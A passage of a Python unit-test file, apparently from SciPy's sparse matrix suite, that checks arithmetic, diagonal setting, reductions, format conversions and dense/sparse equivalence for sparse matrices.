A = matrix([[-1, 0, 17],[0, -5, 0],[1, -4, 0],[0,0,0]],'d')
assert_equal(abs(A),abs(self.spmatrix(A)).todense())
def test_elementwise_power(self):
A = matrix([[-4, -3, -2],[-1, 0, 1],[2, 3, 4]], 'd')
assert_equal(np.power(A, 2), self.spmatrix(A).power(2).todense())
#it's element-wise power function, input has to be a scalar
assert_raises(NotImplementedError, self.spmatrix(A).power, A)
def test_neg(self):
A = matrix([[-1, 0, 17],[0, -5, 0],[1, -4, 0],[0,0,0]],'d')
assert_equal(-A,(-self.spmatrix(A)).todense())
def test_real(self):
D = matrix([[1 + 3j, 2 - 4j]])
A = self.spmatrix(D)
assert_equal(A.real.todense(),D.real)
def test_imag(self):
D = matrix([[1 + 3j, 2 - 4j]])
A = self.spmatrix(D)
assert_equal(A.imag.todense(),D.imag)
def test_diagonal(self):
# Does the matrix's .diagonal() method work?
mats = []
mats.append([[1,0,2]])
mats.append([[1],[0],[2]])
mats.append([[0,1],[0,2],[0,3]])
mats.append([[0,0,1],[0,0,2],[0,3,0]])
mats.append(kron(mats[0],[[1,2]]))
mats.append(kron(mats[0],[[1],[2]]))
mats.append(kron(mats[1],[[1,2],[3,4]]))
mats.append(kron(mats[2],[[1,2],[3,4]]))
mats.append(kron(mats[3],[[1,2],[3,4]]))
mats.append(kron(mats[3],[[1,2,3,4]]))
for m in mats:
assert_equal(self.spmatrix(m).diagonal(),diag(m))
@dec.slow
def test_setdiag(self):
def dense_setdiag(a, v, k):
v = np.asarray(v)
if k >= 0:
n = min(a.shape[0], a.shape[1] - k)
if v.ndim != 0:
n = min(n, len(v))
v = v[:n]
i = np.arange(0, n)
j = np.arange(k, k + n)
a[i,j] = v
elif k < 0:
dense_setdiag(a.T, v, -k)
return
def check_setdiag(a, b, k):
# Check setting diagonal using a scalar, a vector of
# correct length, and too short or too long vectors
for r in [-1, len(np.diag(a, k)), 2, 30]:
if r < 0:
v = int(np.random.randint(1, 20, size=1))
else:
v = np.random.randint(1, 20, size=r)
dense_setdiag(a, v, k)
b.setdiag(v, k)
# check that dense_setdiag worked
d = np.diag(a, k)
if np.asarray(v).ndim == 0:
assert_array_equal(d, v, err_msg=msg + " %d" % (r,))
else:
n = min(len(d), len(v))
assert_array_equal(d[:n], v[:n], err_msg=msg + " %d" % (r,))
# check that sparse setdiag worked
assert_array_equal(b.A, a, err_msg=msg + " %d" % (r,))
# comprehensive test
np.random.seed(1234)
for dtype in [np.int8, np.float64]:
for m in [0, 1, 3, 10]:
for n in [0, 1, 3, 10]:
for k in range(-m+1, n-1):
msg = repr((dtype, m, n, k))
a = np.zeros((m, n), dtype=dtype)
b = self.spmatrix((m, n), dtype=dtype)
check_setdiag(a, b, k)
# check overwriting etc
for k2 in np.random.randint(-m+1, n-1, size=12):
check_setdiag(a, b, k2)
# simpler test case
m = self.spmatrix(np.eye(3))
values = [3, 2, 1]
assert_raises(ValueError, m.setdiag, values, k=4)
m.setdiag(values)
assert_array_equal(m.diagonal(), values)
m.setdiag(values, k=1)
assert_array_equal(m.A, np.array([[3, 3, 0],
[0, 2, 2],
[0, 0, 1]]))
m.setdiag(values, k=-2)
assert_array_equal(m.A, np.array([[3, 3, 0],
[0, 2, 2],
[3, 0, 1]]))
m.setdiag((9,), k=2)
assert_array_equal(m.A[0,2], 9)
m.setdiag((9,), k=-2)
assert_array_equal(m.A[2,0], 9)
def test_nonzero(self):
A = array([[1, 0, 1],[0, 1, 1],[0, 0, 1]])
Asp = self.spmatrix(A)
A_nz = set([tuple(ij) for ij in transpose(A.nonzero())])
Asp_nz = set([tuple(ij) for ij in transpose(Asp.nonzero())])
assert_equal(A_nz, Asp_nz)
def test_getrow(self):
assert_array_equal(self.datsp.getrow(1).todense(), self.dat[1,:])
assert_array_equal(self.datsp.getrow(-1).todense(), self.dat[-1,:])
def test_getcol(self):
assert_array_equal(self.datsp.getcol(1).todense(), self.dat[:,1])
assert_array_equal(self.datsp.getcol(-1).todense(), self.dat[:,-1])
def test_sum(self):
np.random.seed(1234)
dat_1 = np.matrix([[0, 1, 2],
[3, -4, 5],
[-6, 7, 9]])
dat_2 = np.random.rand(40, 40)
dat_3 = np.array([[]])
dat_4 = np.zeros((40, 40))
dat_5 = sparse.rand(40, 40, density=1e-2).A
matrices = [dat_1, dat_2, dat_3, dat_4, dat_5]
def check(dtype, j):
dat = np.matrix(matrices[j], dtype=dtype)
datsp = self.spmatrix(dat, dtype=dtype)
assert_array_almost_equal(dat.sum(), datsp.sum())
assert_equal(dat.sum().dtype, datsp.sum().dtype)
assert_array_almost_equal(dat.sum(axis=None), datsp.sum(axis=None))
assert_equal(dat.sum(axis=None).dtype, datsp.sum(axis=None).dtype)
assert_array_almost_equal(dat.sum(axis=0), datsp.sum(axis=0))
assert_equal(dat.sum(axis=0).dtype, datsp.sum(axis=0).dtype)
assert_array_almost_equal(dat.sum(axis=1), datsp.sum(axis=1))
assert_equal(dat.sum(axis=1).dtype, datsp.sum(axis=1).dtype)
if NumpyVersion(np.__version__) >= '1.7.0':
# np.matrix.sum with negative axis arg doesn't work for < 1.7
assert_array_almost_equal(dat.sum(axis=-2), datsp.sum(axis=-2))
assert_equal(dat.sum(axis=-2).dtype, datsp.sum(axis=-2).dtype)
assert_array_almost_equal(dat.sum(axis=-1), datsp.sum(axis=-1))
assert_equal(dat.sum(axis=-1).dtype, datsp.sum(axis=-1).dtype)
for dtype in self.checked_dtypes:
for j in range(len(matrices)):
yield check, dtype, j
def test_mean(self):
def check(dtype):
dat = np.matrix([[0, 1, 2],
[3, -4, 5],
[-6, 7, 9]], dtype=dtype)
datsp = self.spmatrix(dat, dtype=dtype)
assert_array_almost_equal(dat.mean(), datsp.mean())
assert_equal(dat.mean().dtype, datsp.mean().dtype)
assert_array_almost_equal(dat.mean(axis=None), datsp.mean(axis=None))
assert_equal(dat.mean(axis=None).dtype, datsp.mean(axis=None).dtype)
assert_array_almost_equal(dat.mean(axis=0), datsp.mean(axis=0))
assert_equal(dat.mean(axis=0).dtype, datsp.mean(axis=0).dtype)
assert_array_almost_equal(dat.mean(axis=1), datsp.mean(axis=1))
assert_equal(dat.mean(axis=1).dtype, datsp.mean(axis=1).dtype)
if NumpyVersion(np.__version__) >= '1.7.0':
# np.matrix.sum with negative axis arg doesn't work for < 1.7
assert_array_almost_equal(dat.mean(axis=-2), datsp.mean(axis=-2))
assert_equal(dat.mean(axis=-2).dtype, datsp.mean(axis=-2).dtype)
assert_array_almost_equal(dat.mean(axis=-1), datsp.mean(axis=-1))
assert_equal(dat.mean(axis=-1).dtype, datsp.mean(axis=-1).dtype)
for dtype in self.checked_dtypes:
yield check, dtype
def test_expm(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
M = array([[1, 0, 2], [0, 0, 3], [-4, 5, 6]], float)
sM = self.spmatrix(M, shape=(3,3), dtype=float)
Mexp = scipy.linalg.expm(M)
sMexp = expm(sM).todense()
assert_array_almost_equal((sMexp - Mexp), zeros((3, 3)))
N = array([[3., 0., 1.], [0., 2., 0.], [0., 0., 0.]])
sN = self.spmatrix(N, shape=(3,3), dtype=float)
Nexp = scipy.linalg.expm(N)
sNexp = expm(sN).todense()
assert_array_almost_equal((sNexp - Nexp), zeros((3, 3)))
def test_inv(self):
def check(dtype):
M = array([[1, 0, 2], [0, 0, 3], [-4, 5, 6]], dtype)
sM = self.spmatrix(M, shape=(3,3), dtype=dtype)
sMinv = inv(sM)
assert_array_almost_equal(sMinv.dot(sM).todense(), np.eye(3))
for dtype in [float]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield check, dtype
def test_from_array(self):
A = array([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
A = array([[1.0 + 3j, 0, 0],
[0, 2.0 + 5, 0],
[0, 0, 0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
assert_array_equal(self.spmatrix(A, dtype='int16').toarray(), A.astype('int16'))
def test_from_matrix(self):
A = matrix([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
assert_array_equal(self.spmatrix(A).todense(), A)
A = matrix([[1.0 + 3j, 0, 0],
[0, 2.0 + 5, 0],
[0, 0, 0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
assert_array_equal(self.spmatrix(A, dtype='int16').toarray(), A.astype('int16'))
def test_from_list(self):
A = [[1,0,0],[2,3,4],[0,5,0],[0,0,0]]
assert_array_equal(self.spmatrix(A).todense(), A)
A = [[1.0 + 3j, 0, 0],
[0, 2.0 + 5, 0],
[0, 0, 0]]
assert_array_equal(self.spmatrix(A).toarray(), array(A))
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
assert_array_equal(self.spmatrix(A, dtype='int16').todense(), array(A).astype('int16'))
def test_from_sparse(self):
D = array([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
S = csr_matrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
S = self.spmatrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
D = array([[1.0 + 3j, 0, 0],
[0, 2.0 + 5, 0],
[0, 0, 0]])
S = csr_matrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
assert_array_equal(self.spmatrix(S, dtype='int16').toarray(), D.astype('int16'))
S = self.spmatrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
assert_array_equal(self.spmatrix(S, dtype='int16').toarray(), D.astype('int16'))
# def test_array(self):
# """test array(A) where A is in sparse format"""
# assert_equal( array(self.datsp), self.dat )
def test_todense(self):
# Check C-contiguous (default).
chk = self.datsp.todense()
assert_array_equal(chk, self.dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check C-contiguous (with arg).
chk = self.datsp.todense(order='C')
assert_array_equal(chk, self.dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check F-contiguous (with arg).
chk = self.datsp.todense(order='F')
assert_array_equal(chk, self.dat)
assert_(not chk.flags.c_contiguous)
assert_(chk.flags.f_contiguous)
# Check with out argument (array).
out = np.zeros(self.datsp.shape, dtype=self.datsp.dtype)
chk = self.datsp.todense(out=out)
assert_array_equal(self.dat, out)
assert_array_equal(self.dat, chk)
assert_(chk.base is out)
# Check with out array (matrix).
out = np.asmatrix(np.zeros(self.datsp.shape, dtype=self.datsp.dtype))
chk = self.datsp.todense(out=out)
assert_array_equal(self.dat, out)
assert_array_equal(self.dat, chk)
assert_(chk is out)
a = matrix([1.,2.,3.])
dense_dot_dense = a * self.dat
check = a * self.datsp.todense()
assert_array_equal(dense_dot_dense, check)
b = matrix([1.,2.,3.,4.]).T
dense_dot_dense = self.dat * b
check2 = self.datsp.todense() * b
assert_array_equal(dense_dot_dense, check2)
# Check bool data works.
spbool = self.spmatrix(self.dat, dtype=bool)
matbool = self.dat.astype(bool)
assert_array_equal(spbool.todense(), matbool)
def test_toarray(self):
# Check C-contiguous (default).
dat = asarray(self.dat)
chk = self.datsp.toarray()
assert_array_equal(chk, dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check C-contiguous (with arg).
chk = self.datsp.toarray(order='C')
assert_array_equal(chk, dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check F-contiguous (with arg).
chk = self.datsp.toarray(order='F')
assert_array_equal(chk, dat)
assert_(not chk.flags.c_contiguous)
assert_(chk.flags.f_contiguous)
# Check with output arg.
out = np.zeros(self.datsp.shape, dtype=self.datsp.dtype)
self.datsp.toarray(out=out)
assert_array_equal(chk, dat)
# Check that things are fine when we don't initialize with zeros.
out[...] = 1.
self.datsp.toarray(out=out)
assert_array_equal(chk, dat)
a = array([1.,2.,3.])
dense_dot_dense = dot(a, dat)
check = dot(a, self.datsp.toarray())
assert_array_equal(dense_dot_dense, check)
b = array([1.,2.,3.,4.])
dense_dot_dense = dot(dat, b)
check2 = dot(self.datsp.toarray(), b)
assert_array_equal(dense_dot_dense, check2)
# Check bool data works.
spbool = self.spmatrix(self.dat, dtype=bool)
arrbool = dat.astype(bool)
assert_array_equal(spbool.toarray(), arrbool)
def test_astype(self):
D = array([[2.0 + 3j, 0, 0],
[0, 4.0 + 5j, 0],
[0, 0, 0]])
S = self.spmatrix(D)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
for x in supported_dtypes:
assert_equal(S.astype(x).dtype, D.astype(x).dtype) # correct type
assert_equal(S.astype(x).toarray(), D.astype(x)) # correct values
assert_equal(S.astype(x).format, S.format) # format preserved
def test_asfptype(self):
A = self.spmatrix(arange(6,dtype='int32').reshape(2,3))
assert_equal(A.dtype, np.dtype('int32'))
assert_equal(A.asfptype().dtype, np.dtype('float64'))
assert_equal(A.asfptype().format, A.format)
assert_equal(A.astype('int16').asfptype().dtype, np.dtype('float32'))
assert_equal(A.astype('complex128').asfptype().dtype, np.dtype('complex128'))
B = A.asfptype()
C = B.asfptype()
assert_(B is C)
def test_mul_scalar(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
assert_array_equal(dat*2,(datsp*2).todense())
assert_array_equal(dat*17.3,(datsp*17.3).todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_rmul_scalar(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
assert_array_equal(2*dat,(2*datsp).todense())
assert_array_equal(17.3*dat,(17.3*datsp).todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_add(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
a = dat.copy()
a[0,2] = 2.0
b = datsp
c = b + a
assert_array_equal(c, b.todense() + a)
c = b + b.tocsr()
assert_array_equal(c.todense(),
b.todense() + b.todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_radd(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
a = dat.copy()
a[0,2] = 2.0
b = datsp
c = a + b
assert_array_equal(c, a + b.todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_sub(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
assert_array_equal((datsp - datsp).todense(),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((datsp - A).todense(),dat - A.todense())
assert_array_equal((A - datsp).todense(),A.todense() - dat)
for dtype in self.checked_dtypes:
yield check, dtype
def test_rsub(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
assert_array_equal((dat - datsp),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
assert_array_equal((datsp - dat),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((dat - A),dat - A.todense())
assert_array_equal((A - dat),A.todense() - dat)
assert_array_equal(A.todense() - datsp,A.todense() - dat)
assert_array_equal(datsp - A.todense(),dat - A.todense())
for dtype in self.checked_dtypes:
if (dtype == np.dtype('bool')) and (
NumpyVersion(np.__version__) >= '1.9.0.dev'):
# boolean array subtraction deprecated in 1.9.0
continue
yield check, dtype
def test_add0(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
# Adding 0 to a sparse matrix
assert_array_equal((datsp + 0).todense(), dat)
# use sum (which takes 0 as a starting value)
sumS = sum([k * datsp for k in range(1, 3)])
sumD = sum([k * dat for k in range(1, 3)])
assert_almost_equal(sumS.todense(), sumD)
for dtype in self.checked_dtypes:
yield check, dtype
def test_elementwise_multiply(self):
# real/real
A = array([[4,0,9],[2,-3,5]])
B = array([[0,7,0],[0,-4,0]])
Asp = self.spmatrix(A)
Bsp = self.spmatrix(B)
assert_almost_equal(Asp.multiply(Bsp).todense(), A*B) # sparse/sparse
assert_almost_equal(Asp.multiply(B).todense(), A*B) # sparse/dense
# complex/complex
C = array([[1-2j,0+5j,-1+0j],[4-3j,-3+6j,5]])
D = array([[5+2j,7-3j,-2+1j],[0-1j,-4+2j,9]])
Csp = self.spmatrix(C)
Dsp = self.spmatrix(D)
assert_almost_equal(Csp.multiply(Dsp).todense(), C*D) # sparse/sparse
assert_almost_equal(Csp.multiply(D).todense(), C*D) # sparse/dense
# real/complex
assert_almost_equal(Asp.multiply(Dsp).todense(), A*D) # sparse/sparse
assert_almost_equal(Asp.multiply(D).todense(), A*D) # sparse/dense
def test_elementwise_multiply_broadcast(self):
A = array([4])
B = array([[-9]])
C = array([1,-1,0])
D = array([[7,9,-9]])
E = array([[3],[2],[1]])
F = array([[8,6,3],[-4,3,2],[6,6,6]])
G = [1, 2, 3]
H = np.ones((3, 4))
J = H.T
# Rank 1 arrays can't be cast as spmatrices (A and C) so leave
# them out.
Bsp = self.spmatrix(B)
Dsp = self.spmatrix(D)
Esp = self.spmatrix(E)
Fsp = self.spmatrix(F)
Hsp = self.spmatrix(H)
Hspp = self.spmatrix(H[0,None])
Jsp = self.spmatrix(J)
Jspp = self.spmatrix(J[:,0,None])
matrices = [A, B, C, D, E, F, G, H, J]
spmatrices = [Bsp, Dsp, Esp, Fsp, Hsp, Hspp, Jsp, Jspp]
# sparse/sparse
for i in spmatrices:
for j in spmatrices:
try:
dense_mult = np.multiply(i.todense(), j.todense())
except ValueError:
assert_raises(ValueError, i.multiply, j)
continue
sp_mult = i.multiply(j)
if isspmatrix(sp_mult):
assert_almost_equal(sp_mult.todense(), dense_mult)
else:
assert_almost_equal(sp_mult, dense_mult)
# sparse/dense
for i in spmatrices:
for j in matrices:
try:
dense_mult = np.multiply(i.todense(), j)
except ValueError:
assert_raises(ValueError, i.multiply, j)
continue
sp_mult = i.multiply(j)
if isspmatrix(sp_mult):
assert_almost_equal(sp_mult.todense(), dense_mult)
else:
assert_almost_equal(sp_mult, dense_mult)
def test_elementwise_divide(self):
expected = [[1,np.nan,np.nan,1],[1,np.nan,1,np.nan],[np.nan,1,np.nan,np.nan]]
assert_array_equal(todense(self.datsp / self.datsp),expected)
denom = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
res = matrix([[1,np.nan,np.nan,0.5],[-3,np.nan,inf,np.nan],[np.nan,0.25,np.nan,np.nan]],'d')
assert_array_equal(todense(self.datsp / denom),res)
# complex
A = array([[1-2j,0+5j,-1+0j],[4-3j,-3+6j,5]])
B = array([[5+2j,7-3j,-2+1j],[0-1j,-4+2j,9]])
Asp = self.spmatrix(A)
Bsp = self.spmatrix(B)
assert_almost_equal(todense(Asp / Bsp), A/B)
def test_pow(self):
A = matrix([[1,0,2,0],[0,3,4,0],[0,5,0,0],[0,6,7,8]])
B = self.spmatrix(A)
for exponent in [0,1,2,3]:
assert_array_equal((B**exponent).todense(),A**exponent)
# invalid exponents
for exponent in [-1, 2.2, 1 + 3j]:
assert_raises(Exception, B.__pow__, exponent)
# nonsquare matrix
B = self.spmatrix(A[:3,:])
assert_raises(Exception, B.__pow__, 1)
def test_rmatvec(self):
M = self.spmatrix(matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]]))
assert_array_almost_equal([1,2,3,4]*M, dot([1,2,3,4], M.toarray()))
row = matrix([[1,2,3,4]])
assert_array_almost_equal(row*M, row*M.todense())
def test_small_multiplication(self):
# test that A*x works for x with shape () (1,) and (1,1)
A = self.spmatrix([[1],[2],[3]])
assert_(isspmatrix(A * array(1)))
assert_equal((A * array(1)).todense(), [[1],[2],[3]])
assert_equal(A * array([1]), array([1,2,3]))
assert_equal(A * array([[1]]), array([[1],[2],[3]]))
def test_binop_custom_type(self):
# Non-regression test: previously, binary operations would raise
# NotImplementedError instead of returning NotImplemented
# (https://docs.python.org/library/constants.html#NotImplemented)
# so overloading Custom + matrix etc. didn't work.
A = self.spmatrix([[1], [2], [3]])
B = BinopTester()
assert_equal(A + B, "matrix on the left")
assert_equal(A - B, "matrix on the left")
assert_equal(A * B, "matrix on the left")
assert_equal(B + A, "matrix on the right")
assert_equal(B - A, "matrix on the right")
assert_equal(B * A, "matrix on the right")
def test_matvec(self):
M = self.spmatrix(matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]]))
col = matrix([1,2,3]).T
assert_array_almost_equal(M * col, M.todense() * col)
# check result dimensions (ticket #514)
assert_equal((M * array([1,2,3])).shape,(4,))
assert_equal((M * array([[1],[2],[3]])).shape,(4,1))
assert_equal((M * matrix([[1],[2],[3]])).shape,(4,1))
# check result type
assert_(isinstance(M * array([1,2,3]), ndarray))
assert_(isinstance(M * matrix([1,2,3]).T, matrix))
# ensure exception is raised for improper dimensions
bad_vecs = [array([1,2]), array([1,2,3,4]), array([[1],[2]]),
matrix([1,2,3]), matrix([[1],[2]])]
for x in bad_vecs:
assert_raises(ValueError, M.__mul__, x)
# Should this be supported or not?!
# flat = array([1,2,3])
# assert_array_almost_equal(M*flat, M.todense()*flat)
# Currently numpy dense matrices promote the result to a 1x3 matrix,
# whereas sparse matrices leave the result as a rank-1 array. Which
# is preferable?
# Note: the following command does not work. Both NumPy matrices
# and spmatrices should raise exceptions!
# assert_array_almost_equal(M*[1,2,3], M.todense()*[1,2,3])
# The current relationship between sparse matrix products and array
# products is as follows:
assert_array_almost_equal(M*array([1,2,3]), dot(M.A,[1,2,3]))
assert_array_almost_equal(M*[[1],[2],[3]], asmatrix(dot(M.A,[1,2,3])).T)
# Note that the result of M * x is dense if x has a singleton dimension.
# Currently M.matvec(asarray(col)) is rank-1, whereas M.matvec(col)
# is rank-2. Is this desirable?
def test_matmat_sparse(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
a2 = array([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
b = matrix([[0,1],[1,0],[0,2]],'d')
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
assert_array_almost_equal((asp*bsp).todense(), a*b)
assert_array_almost_equal(asp*b, a*b)
assert_array_almost_equal(a*bsp, a*b)
assert_array_almost_equal(a2*bsp, a*b)
# Now try performing cross-type multplication:
csp = bsp.tocsc()
c = b
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal(asp*c, a*c)
assert_array_almost_equal(a*csp, a*c)
assert_array_almost_equal(a2*csp, a*c)
csp = bsp.tocsr()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal(asp*c, a*c)
assert_array_almost_equal(a*csp, a*c)
assert_array_almost_equal(a2*csp, a*c)
csp = bsp.tocoo()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal(asp*c, a*c)
assert_array_almost_equal(a*csp, a*c)
assert_array_almost_equal(a2*csp, a*c)
# Test provided by Andy Fraser, 2006-03-26
L = 30
frac = .3
random.seed(0) # make runs repeatable
A = zeros((L,2))
for i in xrange(L):
for j in xrange(2):
r = random.random()
if r < frac:
A[i,j] = r/frac
A = self.spmatrix(A)
B = A*A.T
assert_array_almost_equal(B.todense(), A.todense() * A.T.todense())
assert_array_almost_equal(B.todense(), A.todense() * A.todense().T)
# check dimension mismatch 2x2 times 3x2
A = self.spmatrix([[1,2],[3,4]])
B = self.spmatrix([[1,2],[3,4],[5,6]])
assert_raises(ValueError, A.__mul__, B)
def test_matmat_dense(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
asp = self.spmatrix(a)
# check both array and matrix types
bs = [array([[1,2],[3,4],[5,6]]), matrix([[1,2],[3,4],[5,6]])]
for b in bs:
result = asp*b
assert_(isinstance(result, type(b)))
assert_equal(result.shape, (4,2))
assert_equal(result, dot(a,b))
def test_sparse_format_conversions(self):
A = sparse.kron([[1,0,2],[0,3,4],[5,0,0]], [[1,2],[0,3]])
D = A.todense()
A = self.spmatrix(A)
for format in ['bsr','coo','csc','csr','dia','dok','lil']:
a = A.asformat(format)
assert_equal(a.format,format)
assert_array_equal(a.todense(), D)
b = self.spmatrix(D+3j).asformat(format)
assert_equal(b.format,format)
assert_array_equal(b.todense(), D+3j)
c = eval(format + '_matrix')(A)
assert_equal(c.format,format)
assert_array_equal(c.todense(), D)
def test_tobsr(self):
x = array([[1,0,2,0],[0,0,0,0],[0,0,4,5]])
y = array([[0,1,2],[3,0,5]])
A = kron(x,y)
Asp = self.spmatrix(A)
for format in ['bsr']:
fn = getattr(Asp, 'to' + format)
for X in [1, 2, 3, 6]:
for Y in [1, 2, 3, 4, 6, 12]:
assert_equal(fn(blocksize=(X,Y)).todense(), A)
def test_transpose(self):
dat_1 = self.dat
dat_2 = np.array([[]])
matrices = [dat_1, dat_2]
def check(dtype, j):
dat = np.matrix(matrices[j], dtype=dtype)
datsp = self.spmatrix(dat)
a = datsp.transpose()
b = dat.transpose()
assert_array_equal(a.todense(), b)
assert_array_equal(a.transpose().todense(), dat)
assert_equal(a.dtype, b.dtype)
assert_array_equal(self.spmatrix((3,4)).T.todense(), zeros((4,3)))
for dtype in self.checked_dtypes:
for j in range(len(matrices)):
yield check, dtype, j
def test_add_dense(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
# adding a dense matrix to a sparse matrix
sum1 = dat + datsp
assert_array_equal(sum1, dat + dat)
sum2 = datsp + dat
assert_array_equal(sum2, dat + dat)
for dtype in self.checked_dtypes:
yield check, dtype
def test_sub_dense(self):
# subtracting a dense matrix to/from a sparse matrix
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
# Behavior is different for bool.
if dat.dtype == bool:
sum1 = dat - datsp
assert_array_equal(sum1, dat - dat)
sum2 = datsp - dat
assert_array_equal(sum2, dat - dat)
else:
# Manually add to avoid upcasting from scalar
# multiplication.
sum1 = (dat + dat + dat) - datsp
assert_array_equal(sum1, dat + dat)
sum2 = (datsp + datsp + datsp) - dat
assert_array_equal(sum2, dat + dat)
for dtype in self.checked_dtypes:
if (dtype == np.dtype('bool')) and (
NumpyVersion(np.__version__) >= '1.9.0.dev'):
# boolean array subtraction deprecated in 1.9.0
continue
yield check, dtype
def test_maximum_minimum(self):
A_dense = np.array([[1, 0, 3], [0, 4, 5], [0, 0, 0]])
B_dense = np.array([[1, 1, 2], [0, 3, 6], [1, -1, 0]])
A_dense_cpx = np.array([[1, 0, 3], [0, 4+2j, 5], [0, 1j, -1j]])
def check(dtype, dtype2, btype):
if np.issubdtype(dtype, np.complexfloating):
A = self.spmatrix(A_dense_cpx.astype(dtype))
else:
A = self.spmatrix(A_dense.astype(dtype))
if btype == 'scalar':
B = dtype2.type(1)
elif btype == 'scalar2':
B = dtype2.type(-1)
elif btype == 'dense':
B = B_dense.astype(dtype2)
elif btype == 'sparse':
B = self.spmatrix(B_dense.astype(dtype2))
else:
raise ValueError()
max_s = A.maximum(B)
max_d = np.maximum(todense(A), todense(B))
assert_array_equal(todense(max_s), max_d)
assert_equal(max_s.dtype, max_d.dtype)
min_s = A.minimum(B)
min_d = np.minimum(todense(A), todense(B))
assert_array_equal(todense(min_s), min_d)
assert_equal(min_s.dtype, min_d.dtype)
for dtype in self.checked_dtypes:
for dtype2 in [np.int8, np.float_, np.complex_]:
for btype in ['scalar', 'scalar2', 'dense', 'sparse']:
yield check, np.dtype(dtype), np.dtype(dtype2), btype
def test_copy(self):
# Check whether the copy=True and copy=False keywords work
A = self.datsp
# check that copy preserves format
assert_equal(A.copy().format, A.format)
assert_equal(A.__class__(A,copy=True).format, A.format)
assert_equal(A.__class__(A,copy=False).format, A.format)
assert_equal(A.copy().todense(), A.todense())
assert_equal(A.__class__(A,copy=True).todense(), A.todense())
assert_equal(A.__class__(A,copy=False).todense(), A.todense())
# check that XXX_matrix.toXXX() works
toself = getattr(A,'to' + A.format)
assert_equal(toself().format, A.format)
assert_equal(toself(copy=True).format, A.format)
assert_equal(toself(copy=False).format, A.format)
assert_equal(toself().todense(), A.todense())
assert_equal(toself(copy=True).todense(), A.todense())
assert_equal(toself(copy=False).todense(), A.todense())
# check whether the data is copied?
# TODO: deal with non-indexable types somehow
B = A.copy()
try:
B[0,0] += 1
assert_(B[0,0] != A[0,0])
except NotImplementedError:
# not all sparse matrices can be indexed
pass
except TypeError:
# not all sparse matrices can be indexed
pass
# test that __iter__ is compatible with NumPy matrix
def test_iterator(self):
B = np.matrix(np.arange(50).reshape(5, 10))
A = self.spmatrix(B)
for x, y in zip(A, B):
assert_equal(x.todense(), y)
def test_size_zero_matrix_arithmetic(self):
# Test basic matrix arithmatic with shapes like (0,0), (10,0),
# (0, 3), etc.
mat = np.matrix([])
a = mat.reshape((0, 0))
b = mat.reshape((0, 1))
c = mat.reshape((0, 5))
d = mat.reshape((1, 0))
e = mat.reshape((5, 0))
f = np.matrix(np.ones([5, 5]))
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
csp = self.spmatrix(c)
dsp = self.spmatrix(d)
esp = self.spmatrix(e)
fsp = self.spmatrix(f)
# matrix product.
assert_array_equal(asp.dot(asp).A, np.dot(a, a).A)
assert_array_equal(bsp.dot(dsp).A, np.dot(b, d).A)
assert_array_equal(dsp.dot(bsp).A, np.dot(d, b).A)
assert_array_equal(csp.dot(esp).A, np.dot(c, e).A)
assert_array_equal(csp.dot(fsp).A, np.dot(c, f).A)
assert_array_equal(esp.dot(csp).A, np.dot(e, c).A)
